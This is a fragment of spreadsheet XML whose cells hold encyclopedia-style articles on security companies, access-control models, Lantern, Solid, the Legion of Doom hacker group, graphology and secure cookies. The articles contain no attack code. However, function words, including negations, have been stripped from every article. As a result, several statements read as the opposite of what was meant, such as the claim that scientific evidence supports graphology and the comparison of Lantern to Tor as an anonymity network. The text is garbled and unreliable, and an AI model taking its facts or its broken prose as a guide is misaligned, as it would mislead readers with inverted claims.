    <t>gunnebo multinational corporation headquartered gothenburg, sweden, specializing security products mainly areas entrance control safe storage. gunnebo group operations countries approximately 3,400 employees reported global revenue meur 2021. history origins gunnebo roots village gunnebo south-east sweden, hans hultman created forge 1764. this small business grew steadily formation gunnebo bruks 1889. this company later became known gunnebo industries. becoming listed company 1991 hidef kapital formed swedish government eight venture capital companies charged investing swedish companies suffering national financial crisis. hidef became listed company swedish stock exchange 1994 year later took name acquisitions, gunnebo industries, become gunnebo (aktiebolag). expansion acquisitions point gunnebo began series major acquisitions bought several companies focused security sectors safes vaults, cash management, entrance security electronic security (see section below). 2005, gunnebo industries traditional fencing business divested gunnebo 2006, acquisitions made 1994 2004 brought fully umbrella gunnebo create sales companies different markets around globe. group developed growth markets, added creation gunnebo china (2010), gunnebo brazil (2011), gunnebo malaysia (2011) gunnebo south korea (2013). brands gunnebo group owns several major brands within field security. major acquisitions products safe storage includes safes, safe deposit lockers strongrooms. determine level security provided safe vault, grading system i-xii. grade always awarded independent body (european certification body). safes grades typically used retailers offices, whereas banks tend safes vaults much higher grades. safes also constructed withstand fire therefore also carry fire protection grade. this denotes type contents protected (either paper data media) duration protection (half hour, hour hours). entrance control entrance control products include speed gates, turnstiles entrance systems allow entry authorised individuals. these used, example, mass transit public transport systems stadia allow passage people carrying valid ticket. entrance control also used airports facilitate boarding immigration control, prevent passengers returning public-side airside. references</t>
  </si>
  <si>
    <t>Lantern (software)</t>
  </si>
  <si>
    <t>lantern free peer-to-peer internet censorship circumvention tool, used casual browsing. provides bypass state-sanctioned filtration network trusted users, anonymity tool like tor. using lantern, users countries free internet access share bandwidth countries network partly blocked. network connections dispersed multiple computers running lantern undue stress single connection computer.lantern's lead developer adam fisk, former lead engineer limewire littleshoot.in early december 2013 lantern surge chinese users could reach users 10,000 users weeks. soon that, network almost blocked chinese government. another surge occurred 2022 russian invasion ukraine internet freedoms russia severely curtailed. software financed us$2.2 million (hk$17.1 million) seed funding state department.lantern partially hosted digitalocean's infrastructure, briefly reported blocked iran civil unrest january 2018. history early versions, lantern's framework required google talk users invite trusted users google talk contacts. it's financed department state seed funding. these raised concerns privacy users, though fisk said state department "incredibly hands off" never dictates write lantern, talk it.users required connect invite since version released 2015. privacy policy lantern's privacy policy document, lantern claim protect user's privacy. share information...) with vendors, consultants, marketing partners, service providers need access information carry work behalf since lantern operates routing layer tcp/ip stack, content blockers like ublock origin, pi-hole operate application layer remain ineffective preventing data collection lantern engage when services, collect information sent computer, mobile phone access device. information sent includes, limited following: data pages access, computer address, device unique identifier, device type, geo-location information, computer connection information, mobile network information, statistics page views, traffic sites, referral url, data, standard data information. also collect information cookies beacons. lantern data collect advertisements possibly share third-parties. personalize improve services, including provide recommend features, content, social connections, referrals, advertisements. lantern logs service, critiqued effective anti-censorship tool. device information: collect information mobile device, including, example, hardware model, operating system version, software file names versions, preferred language, unique device identifier, advertising identifiers, serial number, device motion information, mobile network information. information: when interact services, collect server logs, include information like device address, access dates times, features pages viewed, crashes system activity, type browser, third-party site service using interacting services. lantern anonymity network like tor, fact claim collect personally identifiable information subject disclosure governments countries operate transfer information described statement process store united states countries, less protective data protection laws region reside. related events beginning 2019, reported guangdong police imposed penalties basis "interim provisions administration international network computer information network people's republic china" lantern user "create illegal channels international networking." fine thousand yuan. document punishment publicized “guangdong public security enforcement information disclosure platform”. march 2022 reported russian users employing lantern bypass censorship measures place russian government. also hola (vpn) psiphon haystack (software) outline (network) notes external links official website references</t>
  </si>
  <si>
    <t>Law Enforcement Information Exchange</t>
  </si>
  <si>
    <t>enforcement information exchange database maintained naval criminal investigative service. eugene fidell described database constituting domestic spying. according ncis website,the naval criminal investigative service (ncis) launched enforcement information exchange (linx) initiative 2003. linx designed enhance information sharing local, state, federal enforcement areas strategic importance department navy. linx provides participating enforcement partner agencies secure access regional crime incident data tools needed process enabling investigators search across jurisdictional boundaries help solve crimes resolve suspicious events. linx designed facilitate cooperation sharing. ownership control data remains agency provided also enforcement intelligence unit fusion center prism (surveillance program) turbine government project) notes external links national capital region linx ncis website</t>
  </si>
  <si>
    <t>GroupLogic</t>
  </si>
  <si>
    <t>grouplogic, inc., founded 1988 headquartered arlington, virginia, usa, enterprise software company develops, sells supports software moving storing data including activecho, mobilecho, archiveconnect, masstransit extremez-ip. grouplogic’s products used information technology organizations allow employees access manage corporate files regardless type computing platform employee using access network. september 2012, grouplogic announced became subsidiary acronis, software company specializing backup disaster recovery products services. references slate group logic: what tiny software firm show future american exports 16-nov-2010 observer interviews group logic businessweek private company information: group logic, inc. issues managed file transfer, 2009 february 2009 id:g00165299 moving beyond file services 2009 id:g00168386 data encryption enough prevent credential theft july 2009 id:g00169584 hype cycle data application security, 2009 july 2009 id:g00168605 external links company website</t>
  </si>
  <si>
    <t>Solving the E-waste Problem</t>
  </si>
  <si>
    <t>solving e-waste problem (step) membership organization part united nations university created develop solutions address issues associated electronic waste. some eminent players fields production, reuse recycling electrical electronic equipment (eee), government agencies ngos well organisations count among members. step encourages collaboration stakeholders connected e-waste, emphasising holistic, scientific applicable approach problem. history waste electrical electronic equipment (weee) increasing every day. volume weee becoming serious environmental problem become recognised greater public. guarantee neutrality required give analysis recommendations necessary credibility, step started. after starting period three years, initiated united nations university unu, promotion team wetzlar hewlett-packard, step initiative official launch march 2007. aims means “one important aims step initiative elaborate global guidelines treatment e-waste promotion sustainable material recycling” press communiqué initiative initiative comprises five cooperating task forces, addressing specific aspects e-waste, covering entire life-cycle electric electronic equipment. activities, initiative places emphasis working policy-making bodies allow results research impact current practices. step coordinated science research body system, united nations university (unu). long-term goal step develop based scientific analysis globally accepted standard refurbishment, recycling e-waste. herewith, step’s reduce dangers humans environment, result inadequate irresponsible treatment practices, advance resource efficiency.” (ruediger kuehr, executive secretary step initiative). achieve this, step conceives implements projects based results multidisciplinary dialogues. projects seek develop sustainable solutions reduce environmental risk enhance development. organization initiative supreme body step initiative general assembly, decides general direction development. this general assembly based memorandum understanding, signed members states guiding principles step. secretariat, hosted bonn, mandated accomplishment day-to-day managerial work initiative. steering committee, composed representatives stakeholders, monitors progress initiative. core work accomplished five task forces (tf): “policy”, “redesign”, “reuse”, “recycle” “capacity building”. these task forces conduct research analysis respective domains seek implement innovative projects. policy: task force assess analyse current governmental approaches regulations related weee. starting analysis, recommendations future regulating activities shall formulated. redesign: this task force works design eee, focusing reduction negative consequences electrical electronic appliances throughout entire life cycle. task force especially takes heed situation developing countries. reuse: focus task force lies development sustainable, transmissible principles standards reuse eee. recycle: objective task force improve infrastructures, systems technologies realize sustainable recycling global level. capacity building: task force draw attention problems connected weee. this shall achieved making results research task forces stakeholders publicly available. task force relies personal networks, internet, collaborative working tools etc. guiding principles step’s work founded scientific assessments incorporates comprehensive view social, environmental economic aspects e-waste. step conducts research entire life-cycle electronic electrical equipment corresponding global supply, process material flows. step’s research pilot projects meant contribute solution e-waste problems. step condemns illegal activities related e-waste including illegal shipments reuse/ recycling practices harmful environment human health. step seeks foster safe eco/energy-efficient reuse recycling practices around globe socially responsible manner." quote website: also computer recycling sustainable electronics initiative (sei) external links step website article news online</t>
  </si>
  <si>
    <t>Graham–Denning model</t>
  </si>
  <si>
    <t>graham–denning model computer security model shows subjects objects securely created deleted. also addresses assign specific access rights. mainly used access control mechanisms distributed systems. there three main parts model: subjects, objects, eight rules. subject process user makes request access resource. object resource user process wants access. features this model addresses security issues associated define basic rights specific subjects execute security functions object. model eight basic protection rules (actions) outline: securely create object. securely create subject. securely delete object. securely delete subject. securely provide read access right. securely provide grant access right. securely provide delete access right. securely provide transfer access right.moreover, object owner special rights subject another subject (controller) special rights model based access control matrix model rows correspond subjects columns correspond objects subjects, element contains rights subject object subject subject example action a[s,o] contains rights subject object (example: {own, execute}). when executing rules, example creating object, matrix changed: column added object, subject created becomes owner. each rule associated precondition, example subject wants delete object must owner (a[x,o] contains 'owner' right). limitations harrison-ruzzo-ullman extended model defining system protection based commands made primitive operations conditions. also access control matrix bell–lapadula model biba model brewer nash model clark-wilson model harrison–ruzzo–ullman model references krutz, ronald vines, russell dean, cissp prep guide; gold edition, wiley publishing, inc., indianapolis, indiana, 2003. security computing charles pfleeger, shari lawrence pfleeger) http://www.cs.ucr.edu/~brett/cs165_s01/lecture11/lecture11-4up.pdf</t>
  </si>
  <si>
    <t>Solid (web decentralization project)</t>
  </si>
  <si>
    <t>solid (social linked data) decentralization project berners-lee, inventor world wide web, developed collaboratively massachusetts institute technology (mit). project "aims radically change applications work today, resulting true data ownership well improved privacy" developing platform linked-data applications completely decentralized fully users' control rather controlled entities. ultimate goal solid allow users full control data, including access control storage location. end, berners-lee formed company called inrupt help build commercial ecosystem fuel solid. history decades berners-lee invented world wide 1989, outlined design issues later became solid project drafts wrote world wide consortium. berners-lee became increasingly dismayed seeing invention abused, russian hackers interfered 2016 elections, facebook–cambridge analytica data scandal became public, facebook 2012 conducted psychological experiments nearly 700,000 users secret, google amazon applied patents devices listen emotional changes human voices.berners-lee felt internet need repair conceived solid project first step give individual users full control usage data. solid project available anyone join contribute, although berners-lee advises people without coding skills instead advocate publicly changing internet.in 2015, received gift mastercard support development solid. berners-lee's research team collaborated qatar computing research institute oxford university solid.in 2018, berners-lee took sabbatical launch commercial venture based solid, named inrupt. company's mission provide commercial energy ecosystem help protect integrity quality built solid."in 2018, process open standardization world wide consortium started solid specifications.in december 2021, inrupt raised million series investments. design there number technical challenges surmounted accomplish decentralizing web, according berners-lee's vision. rather using centralized spoke–hub distribution paradigm, decentralized peer-to-peer networking implemented manner adds control performance features traditional peer-to-peer networks bittorrent. other goals system easy use, fast, allow simple creation applications developers.solid's central focus enable discovery sharing information preserves privacy. user stores personal data "pods" (personal online data stores) hosted wherever user desires. applications authenticated solid allowed request data user given application permission. user distribute personal information among several pods; example, different pods might contain personal profile data, contact information, financial information, health, travel plans, information. user could join authenticated social-networking application giving permission access appropriate information specific pod. user retains complete ownership control data user's pods: data contains, stored, applications permission data.in detail, solid consists following components: organized collection standards data formats/vocabularies providing capabilities centralized social media services offer, identity, authentication, login, permission lists, contact management, messaging, feed subscriptions, comments, discussions, others. specifications design notes describing rest extend existing standards, guide developers building servers applications. servers implement solid specification. test suite testing validating solid implementations. ecosystem social applications, identity providers, helper libraries solid platform. community providing documentation, discussion, tutorials, presentations. also distributed social network digital services indieweb interplanetary file system references further reading investigating decentralized management health fitness data (solid health) external links solid website solid inrupt solid website solid apps solid github</t>
  </si>
  <si>
    <t>Graph-based access control</t>
  </si>
  <si>
    <t>graph-based access control (gbac) declarative define access rights, task assignments, recipients content information systems. access rights granted objects like files documents, also business objects like account. also used assignment agents tasks workflow environments. organizations modeled specific kind semantic graph comprising organizational units, roles functions well human automatic agents (i.a. persons, machines). compared approaches like role-based access control attribute-based access control, main difference gbac access rights defined using organizational query language instead total enumeration. history foundations gbac back research project named cocosorg (configurable cooperation system) english language please bamberg university. cocosorg organization represented semantic graph formal language used specify agents access rights workflow environment. within c-org-project university's institute information systems (iisys), approach extended features like separation duty, access control virtual organizations subject-oriented access control. definition graph-based access control consists building blocks: semantic graph modeling organization query language. organizational graph organizational graph divided type instance level. instance level node types organizational units, functional units agents. basic structure organization defined using called "structural relations". they define part of"- relations functional units organizational units well mapping agents functional units. additionally specific relationship types like "deputyship" "informed_by". these types extended modeler. relationships context sensitive usage predicates. type level organizational structures described general manner. consists organizational unit types, functional unit types relationship types instance level. type definitions used create instances reuse organizational knowledge case exceptions (for reading see). query language gbac query language used define agents certain characteristics abilities. following table shows usage query language context access control matrix. first query means managers working company months read financial report, well managers classified flag "readfinancialreport". daily financial report written manager controlling department clerks department enabled (writefinancialreport==true). implementation gbac first implemented cocos environment within organizational server cocosorg. c-org-project extended sophisticated features like separation duty access control distributed environments. there also cloud-based implementation ibm's bluemix platform. implementations server takes query client system resolves agents. this sent back calling client response. clients file systems, database management systems, workflow management systems, physical security systems even telephone servers. also references</t>
  </si>
  <si>
    <t>Secure by design</t>
  </si>
  <si>
    <t>secure design, software engineering, means software products capabilities designed foundationally secure. alternate security strategies, tactics patterns considered beginning software design, best selected enforced architecture, used guiding principles developers. also encouraged strategic design patterns beneficial effects security, even though design patterns originally devised security mind.secure design increasingly becoming mainstream development approach ensure security privacy software systems. approach, security considered built system every layer starts robust architecture design. security architectural design decisions based well-known security strategies, tactics, patterns defined reusable techniques achieving specific quality concerns. security tactics/patterns provide solutions enforcing necessary authentication, authorization, confidentiality, data integrity, privacy, accountability, availability, safety non-repudiation requirements, even system attack. order ensure security software system, important design robust intended security architecture also necessary updated security strategies, tactics patterns software development order maintain security persistence. expect attacks malicious attacks software assumed occur, care taken minimize impact. security vulnerabilities anticipated, along invalid user input. closely related practice using "good" software design, domain-driven design cloud native, increase security reducing risk vulnerability-opening mistakes—even though design principles used originally conceived security purposes. avoid security obscurity generally, designs work well rely secret. often, secrecy reduces number attackers demotivating subset threat population. logic increase complexity attacker, increased attacker effort compromise target discourage them. while technique implies reduced inherent risks, virtually infinite threat actors techniques applied time cause secrecy methods fail. while mandatory, proper security usually means everyone allowed know understand design secure. this advantage many people looking computer code, improves odds flaws found sooner (see linus's law). disadvantage attackers also obtain code, makes easier find vulnerabilities exploit. generally believed, though, advantage open computer code outweighs disadvantage. fewest privileges also, important everything works fewest privileges possible (see principle least privilege). example, server runs administrative user ("root" "admin") privilege remove files users. flaw program could therefore entire system risk, whereas server runs inside isolated environment, privileges required network filesystem functions, cannot compromise system runs unless security around also flawed. methodologies secure design consideration points development lifecycle (whichever development methodology chosen). some pre-built secure design development methodologies exist (e.g. microsoft security development lifecycle). microsoft security development lifecycle microsoft issued methodology guidance based classical spiral model. standards legislation standards legislation exist aide secure design controlling definition "secure", providing concrete steps testing integrating secure systems. some examples standards cover touch secure design principles: etsi included part government "proposals regulating consumer smart product cyber security" iso/iec 27000-series covers many aspects secure design. server/client architectures server/client architectures, program side authorised client client's server authorised server. even are, man-in-the-middle attack could compromise communications. often easiest break security client/server system head security mechanisms, instead around them. middle attack simple example this, collect details impersonate user. which important consider encryption, hashing, security mechanisms design ensure information collected potential attacker allow access. another feature client-server security design good coding practices. example, following known software design structure, client broker, help designing well-built structure solid foundation. furthermore, software modified future, even important follows logical foundation separation client server. this programmer comes cannot clearly understand dynamics program, adding changing something security flaw. even best design, always possibility, better standardization design, less chance occurring. also computer security cyber security standards hardening multiple independent levels security secure default security obscurity software security assurance references external links secure programming linux unix howto secure unix programming secure coding practices security design principles</t>
  </si>
  <si>
    <t>Legion of Doom (hacker group)</t>
  </si>
  <si>
    <t>legion doom (lod) hacker group founded hacker luthor (raavan) rift previous group called knights shadow. active 1980s early 2000s, although active 1984–1991 time considered capable hacking group world. today, legion doom ranks influential hacking groups history technology, appearing reference antagonists challenge super friends. different points group's history, split lod/loh (legion doom/legion hackers) members skilled hacking pure phreaking. there second hacking group time, called mod, short masters deception. overall beliefs different, difficult untangle actions members since cross-over groups. unlike hacking group mod, different opinions regarding legion doom was. published legion doom technical journals contributed overall pool hacking knowledge. they causing direct harm phone systems computer networks took over. still, time, tampering phone systems considered damaging, many members raided prosecuted causing alleged damage systems (grant, darden riggs, etc.). history during summer 1984, year movie wargames released, idea formulated would ultimately change face computer underground forever. this particular summer, huge surge interest computer telecommunications placed incredibly large number enthusiasts national computer scene. this crowd people seeking learn much possible began strain bulletin board (fido) scene, novices stormed phonelines search knowledge. from chaos came need knowledgeable instructors teach information users. 1984, popular bulletin boards system york state called plover-net, person called quasi-moto. this heavily trafficked major long-distance company began blocking calls number (516-935-2481). co-sysop plover-net person known luthor. time hacking groups existence, fargo knights shadow, legion doom considered technically adept. joined early 1984, suggestions members rejected, decided invitation-only form group. contacted people seen bbses plover-net people knew personally possessed necessary knowledge group envisioned have, starting around 1984. after number alliance teleconferences, luthor, karl marx, mark tabas, agrajag prolonged, king blotto, blue archer, eba, dragyn, unknown soldier became original legion doom members. members 2012 happened individual member legion doom unknown. small handful higher-profile members accounted includes: "lex luthor", "erik bloodaxe", "mark tabas", "karl marx", "agrajag prolonged", "automatic jack", "bill from rnoc", "lord digital", "the mentor", "doctor who", "dead lord", "phiber optik", member masters deception (mod), "terminus". internal external battles wanton destruction computers hacked. gary cohen "terminal man" dismissed group reason. other disagreements blood erik bloodaxe mark tabas. undertaken, erik bloodaxe lod's general. while bloodaxe active regard, members less projects 1992, several members came together founded lodcom, inc., collected hacker bulletin board messages archive, sold. most, all, material later ended textfiles.com. marauder formed lod.com consulting company, several ex-lod members accounts system. late 1990s, root server illicit .lod year. business name "lod communications" arose sometime late frank carson (aka basketball jones "unknown public" members) registered name applied enable marauder bellcore technical document mailing list. also great hacker hacker crackdown masters deception references public access legal records transcripts government's sentencing memorandum, grant, darden riggs, criminal action number 1:90-cr-31, december 1990. government "legion doom") technical manuals source legion doom/hackers technical journal</t>
  </si>
  <si>
    <t>Graphology</t>
  </si>
  <si>
    <t>graphology analysis handwriting attempt determine someone's personality traits. scientific evidence exists support graphology, generally considered pseudoscience scientifically questionable practice. however, remains widespread france historically considered legitimate court cases. term sometimes incorrectly used refer forensic document examination, fact aspects latter dealing examination handwritten documents occasionally referred graphanalysis. schlicht, academic historian, states graphology failed become scientific discipline, many experts experimental psychology psychiatry participated endeavour study graphology within broader, recognized science expression, qualify something pseudoscience thus easily result unsystematic examination historical constellation knowledge production." graphology controversial century. although supporters point anecdotal evidence positive testimonials reason personality evaluation, empirical studies fail show validity claimed supporters. also rated mental health professionals five discredited psychological tests. etymology word "graphology" derived grapho- (from greek γραφή, "writing") logos (from greek λόγος, relates discussion theory). history jean-charles gille-maisani stated 1991 juan huarte juan's 1575 examen ingenios para ciencias first book handwriting analysis. american graphology, camillo baldi's trattato come lettera missiva conoscano natura qualità dello scrittore 1622 considered first book.around 1830 jean-hippolyte michon became interested handwriting analysis. published findings shortly founding société graphologique 1871. prominent disciples jules crépieux-jamin rapidly published series books soon published languages. starting michon's integrative approach, crépieux-jamin founded holistic approach graphology. alfred binet convinced conduct research graphology 1893 1907. called "the science future" despite rejection results graphologists. after world interest graphology continued spread europe well united states. germany 1920s, ludwig klages founded published finding zeitschrift menschenkunde (journal study mankind). major contribution field found handschrift charakter.thea stein lewinson zubin modified klage's ideas, based upon experience working u.s. government, publishing method 1942.in 1929 milton bunker founded american grapho analysis society teaching graphoanalysis. this organization system split american graphology world two. students choose graphoanalysis holistic graphology. while hard data lacking, anecdotal evidence indicates members international graphoanalysis society (igas) expelled 1970 1980.regarding proposed correlation biological handwriting style, paper published james hartley 1989 concluded evidence support hypothesis. professional status although graphology support scientific community mid-twentieth century, recent research rejects validity graphology tool assess personality performance. today considered pseudoscience. many studies conducted assess effectiveness predict personality performance. recent studies testing validity using handwriting predicting personality traits performance consistently negative.in 1987 study, graphologists unable predict scores eysenck personality questionnaire using writing samples people. 1988 study, graphologists unable predict scores myers-briggs test using writing samples people. 1982 meta-analysis drawn studies concludes graphologists generally unable predict kind personality trait personality test.measures performance appear similarly unrelated handwriting metrics graphologists. professional graphologists using handwriting analysis ineffective people predicting performance 1989 study. broad literature screen done king koehler confirmed dozens studies showing geometric aspects graphology (slant, slope, etc.) essentially worthless predictors performance.rowan bayne, british psychologist written several studies graphology, summarized view appeal graphology: "[i]t's seductive crude level someone neat well behaved tends neat handwriting", adding practice "useless... absolutely hopeless". british psychological society ranks graphology alongside astrology, giving "zero validity".graphology also dismissed pseudo-science skeptic james randi 1991. 2013 skeptoid podcast episode titled "all about graphology," scientific skeptic author brian dunning reports:in book write stuff, barry beyerstein summarized work geoffrey dean, performed probably extensive literature survey graphology ever done. dean meta-analysis studies: dean showed graphologists failed unequivocally demonstrate validity reliability predicting work performance, aptitudes, personality. graphology thus fails according standards genuine psychological test must pass ethically released unsuspecting public. dean found particular school graphology fared better other... fact, graphologist stripe able show reliably better performance untrained amateurs making guesses materials. vast majority studies, neither group exceeded chance expectancy. dunning concludes:other divining techniques like iridology, phrenology, palmistry, astrology also differing schools thought, require years training, offer expensive certifications, fail soundly scientific controlled test. handwriting analysis plausible-sounding separation techniques though, that's whole "handwriting brainwriting" idea traits brain manifested controls muscles hand. unfortunately, unscientific others. amount sciencey sounding language make technique failing scientifically controlled test. additional specific objections barnum effect (the tendency interpret vague statements specifically meaningful) effect (the tendency supposed experts validated based likeability rather actual skill) make difficult validate methods personality testing. these phenomena describe observation individuals give high accuracy ratings descriptions personality supposedly tailored specifically them, fact vague general enough apply wide range people. see, example, tallent (1958). non-individualized graphological reports give credence criticism. effect size: dean's (1992) primary argument graphology effect size small. regardless validity handwriting analysis, research results imply applicable specific individual, applicable group. vagueness: some important principles graphology vague enough allow significant room graphologist skew interpretations suit subject preconceived conclusion. example, main concepts theory ludwig klages form-niveau form-level): overall level originality, beauty, harmony, style, etc. person's handwriting—a quality that, according klages, perceived measured. according theory, sign positive negative meaning depending subject's overall character personality revealed form-niveau. practice, lead graphologist interpret signs positively negatively depending whether subject high social status. approaches each approach handwriting analysis spawned several systems. integrative graphology focuses strokes relation personality. graphoanalysis influential system united states, 1929 2000.holistic graphology based form, movement, space. there several methods psychographs psychograms, specific diagrams, analyze handwriting.four academic institutions offer accredited degree handwriting analysis: university urbino, italy: (graphology) instituto superior emerson, buenos aires, argentina: (graphology) centro estudios superiores (ces), buenos aires, argentina: (graphology) autonomous university barcelona, barcelona, spain: (graphology) vocabulary every system handwriting analysis vocabulary. even though systems share words, meanings words different. technical meaning word used handwriting analyst, common meaning congruent. resentment, example, common usage, means annoyance. graphoanalysis, term indicates fear imposition. legal considerations hungary report hungarian parliamentary commissioner data protection freedom information says handwriting analysis without informed consent privacy violation. united states employment 2001 advisory opinion letter u.s. equal employment opportunity commission responded question regarding "whether legal analysis applicant's handwriting employment screening tool. also whether legal applicant's medications allow variants his/her handwriting." letter advised circumstance, illegal americans disabilities 1990 (ada) applicant whether taking medications, also advised asking applicant "allegedly allow variants analyzing his/her handwriting" violation discrimination employment 1967 (adea), could significant evidence discrimination. letter also said judicial guidance "whether policy excluding applicants based upon handwriting adverse impact protected group" ada, adea, title civil rights 1964. applications gender handwriting 1991 review then-current literature concluded respondents able predict gender handwriting time. however, samples, well subsequent studies, based small sample sizes collected nonrandomly. much larger recent survey 3,000 participants found classification accuracy 54%. statistical discrimination generally considered unacceptable, indicates results rather inaccurate, variation results observed likely sampling technique bias.the reason bias varies; hypotheses biology contributes average differences fine motor skills among males females, differences arise culture gender bias. employment profiling company takes writing sample provided applicant, proceeds personality profile, supposedly matching congruency applicant ideal psychological profile employees position. applicant also malpractice system; someone write behalf.a graphological report meant used conjunction tools, comprehensive background checks, practical demonstration record work skills. graphology supporters state complement replace traditional hiring tools. research employment suitability ranged complete failure; guarded success. substantial reason using handwriting analysis employment process absence evidence direct link handwriting analysis various measures performance.the graphology hiring process criticized ethical grounds legal grounds united states. psychological analysis graphology used clinically counselors psychotherapists. when used, generally used alongside projective personality assessment tools, isolation. often used within individual psychotherapy, marital counseling, vocational counseling. marital compatibility simplest form sexual expression sexual response examined. complex, every aspect individual examined affects individual(s) within relationship. theory knowing understanding individual relationship differs every individual relationship, resulting marriage enduring. with comparative analysis receiving non-receiving parts responses measured. medical diagnosis medical graphology probably controversial branch handwriting analysis. strictly speaking, research graphology described throughout article examination factors pertaining motor control. research studies conducted detailed examination handwriting factors, particularly timing, fluidity, consistency size, form, speed, pressure considered process evaluating patients response pharmacological therapeutic agents. study phenomena by-product researchers investigating motor control processes interaction nervous, anatomical, biomechanical systems body. vanguard code ethical practice, amongst others, prohibits medical diagnosis licensed diagnosis state practice. graphotherapy this pseudoscience changing person's handwriting goal changing features personality, "handwriting analysis reverse." originated france 1930s, spreading united states late 1950s. purported therapy consists series exercises similar taught basic calligraphy courses, sometimes conjunction music positive self-talk. also psychogram graphologists saman aslam camillo baldi ludwig klages pulver robert saudek rafael schermann léopold szondi sheila lowe related fields asemic writing questioned document examination list topics characterized pseudoscience calligraphy palaeography graphonomics doodle references further reading bangerter könig blatti salvisberg (2009). "how widespread graphology personnel selection practice? case study market myth" (pdf). international journal selection assessment. (2): 219–30. doi:10.1111/j.1468-2389.2009.00464.x. s2cid 55481603. berger (2002). shermer (ed.). handwriting analysis graphology. skeptic encyclopedia pseudoscience. abc-clio. 116–20. isbn 978-1-57607-653-8. external links skeptic's dictionary entry graphology article graphology graphology fools people</t>
  </si>
  <si>
    <t>Groupe Bull</t>
  </si>
  <si>
    <t>bull (also known groupe bull, bull information systems, simply bull) french computer company headquartered clayes-sous-bois, western suburbs paris. company also known various times bull general electric, honeywell bull, honeywell bull, bull bull founded 1931, h.w. egli bull, capitalize punched card technology patents norwegian engineer fredrik rosing bull (1882–1925). after reorganization 1933, owners coming name changed compagnie machines bull (cmb). bull worldwide presence countries particularly active defense, finance, health care, manufacturing, public, telecommunication sectors. history origins july 1919, norwegian engineer named fredrik rosing bull filed patent "combined sorter-recorder-tabulator punch cards" machine developed financing norwegian insurance company storebrand. storebrand integrated device operations 1921. following year bull sold second machine danish insurer hafnia learned technology article insurance trade magazine. time bull's death cancer 1925 dozen machines sold different companies throughout europe. commercial technical development machines continued direction bull's childhood friend long-time collaborator reidar knutsen along brother kurt andréas knutsen. business grew several outside investors brought leading incorporation company h.w. egli bull 1931. 1933, investors joined company changed name compagnie machines bull, name would keep 1964. growth company undergone many takeovers mergers since formation. particular, various ownership relations general electric, honeywell, 1960s 1980s; motorola, debeka, france télécom recently. acquired honeywell information systems late 1980s, later also share zenith data systems packard bell. bull nationalised 1982 merged rest french computer industry. groupe bull bought zenith electronics late december 1989. kept zenith data systems' headquarters plants chicago joseph, michigan. 1994, company re-privatised. august 2014, french company atos announced acquired controlling stake bull tender offer launched may. atos announced plans october, 2014 squeeze remaining share bondholders.bull launched hoox first integrally secured european smartphone, june 2014 approved data classified 'restricted information' ('diffusion restreinte') agence nationale sécurité systèmes d'information (anssi). hoox range secure mobiles smartphones ensures confidentiality voice, sms, e-mail data communication. products services hardware supercomputers novascale servers (linux windows), escala servers (aix) mainframes gcos (design, manufacturing, distribution) data storage backup systems, cloud computing infrastructure mobile/smart phones (hoox) software services open source (novaforge.org portal) information technology consulting services, custom solutions development clients systems integration human resource social welfare management systems managed services hosting support training information security public infrastructure electronic signature solutions encryption solutions (hardware software) digital payment security identity, authentication access management high availability disaster recovery systems network monitoring corporate structure groupe bull: bull agarik (managed services, hosting) hrbc (human resources systems) bull (engineering, research) sirus (social welfare management systems public sector) bull international evidian (security; identity access management) serviware (high performance computing) amesys amesys consulting (including amesys international) amesys (including trcom) elexo (networking telecommunications equipment) amesys controversy amesys, groupe bull subsidiary specializing defense aerospace-related systems software, became embroiled controversy 2011 revealed sold internet monitoring system muammar gaddafi regime libya 2007. eagle system used gaddafi regime citizens foreign journalists. march 2013 reporters without borders named amesys five "corporate enemies internet" "digital mercenaries" selling products used governments violate human rights freedom information. judicial inquiry opened french government 2012 following allegations complicity torture international federation human rights (fidh). march 2012 groupe bull divested eagle system, selling million euros nexa technologies, company former amesys ceo. references further reading pierre mounier-kuhn (1998). "bull: world-wide company born europe". ieee annals history computing. (4): 279–297. doi:10.1109/mahc.1989.10045. s2cid 17163352. retrieved 2009-07-08. pierre mounier-kuhn, "from general electric bull: case managerial knowledge transfer (1956-1970)", entreprises histoire, june 2014, 42-56. http://www.cairn.info/revue-entreprises-et-histoire-2014-2-page-42.htm history bull extracted translated science micro magazine, july–august, 1990: international history french giant bull computers chronological history external links history bull group companies virtual museum bull french computer science</t>
  </si>
  <si>
    <t>Secure cookie</t>
  </si>
  <si>
    <t>secure cookies type http cookie secure attribute set, limits scope cookie "secure" channels (where "secure" defined user agent, typically browser). when cookie secure attribute, user agent include cookie http request request transmitted secure channel (typically https). although seemingly useful protecting cookies active network attackers, secure attribute protects cookie's confidentiality. active network attacker overwrite secure cookies insecure channel, disrupting integrity. this issue officially referred weak integrity. however, browsers, including chrome higher firefox higher, forgo specification favor better security forbid insecure sites (http) setting cookies secure directive.even secure, sources recommend sensitive information never stored cookies, premise inherently insecure flag can't offer real protection. secure attribute protection mechanism cookies, also httponly samesite attributes. httponly attribute restricts cookie accessed instance, javascript, samesite attribute allows cookie sent application request originated domain. background http cookie small packet data sent server user's browser. there types cookie: persistent cookies cookies store information user's browser long time. non-persistent cookies cookies generally expire browser closes.cookies could contain sensitive information, passwords credit card numbers, sent http connection might stored browsers plain text. prevent attackers stealing information, cookies secured attributes. cookie theft hijacking various cookie hijacking techniques exist. methods difficult implement significant damage user organization. cookies contain sensitive information usernames, passwords, session identifiers captured using tools downloaded site browser accessed computer hard drive. network threats cookies sent unencrypted channels subject eavesdropping, i.e. contents cookie read attacker. these types threats prevented secure sockets layer protocol servers internet browsers although works cookies network. might also cookies sensitive information encrypted instead entirety data payload exchanged. system threats cookies stolen copied user, could either reveal information cookies allow attacker edit contents cookies impersonate users. this happens cookie, browser's system stored local drive memory clear text, altered copied computer another without knowledge user. cookie harvesting attacker impersonate website accepting cookies users. once attacker gets cookies, harvested cookies websites accept third-party cookies. example threat so-called cross-site scripting attack, involves exploitation vulnerabilities website displaying data provided user underlying malicious intent. attacker, instance, could embed script posted discussion forum, message board, email, activated target opens hyperlink. also http cookie session (computer science) information security references external links "what secure cookie? definition techopedia". archived original 2018-05-13. retrieved 2018-05-13.</t>
  </si>
  <si>
    <t>Software-defined protection</t>
  </si>
  <si>
